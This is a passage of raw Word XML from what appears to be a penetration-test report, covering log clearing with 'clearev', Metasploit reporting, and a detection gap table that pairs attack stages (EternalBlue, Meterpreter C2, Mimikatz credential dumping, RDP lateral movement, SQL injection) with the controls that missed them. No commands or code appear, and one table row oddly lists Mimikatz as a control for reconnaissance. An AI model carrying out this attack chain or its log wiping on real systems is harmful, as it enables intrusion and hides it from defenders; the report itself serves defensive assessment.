          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; removed temporary payloads and scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 8: Documentation &amp; Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Generated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reports (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vulns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loot</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Attack Timeline summarized per phase</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>3.5 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Control Effectiveness Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="007A331F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10075" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="2085"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="4050"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="359"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attack Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Expected Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Gap Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="701"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reconnaissance (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port scanning alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>No SIEM correlation rules for reconnaissance patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="809"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Endpoint AV (Windows Defender)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Malicious exploit blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Signature-based detection bypassed; Windows 7 unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="701"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meterpreter C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network IDS (Snort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Suspicious outbound HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Alert fatigue; no 24/7 SOC monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>EDR solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Credential dumping detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>no behavioral monitoring on endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="755"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lateral Movement (RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>SIEM (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Splunk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Unusual RDP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>No alerting rule for suspicious RDP from compromised host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="782"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQL Injection (OWASP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQL injection blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
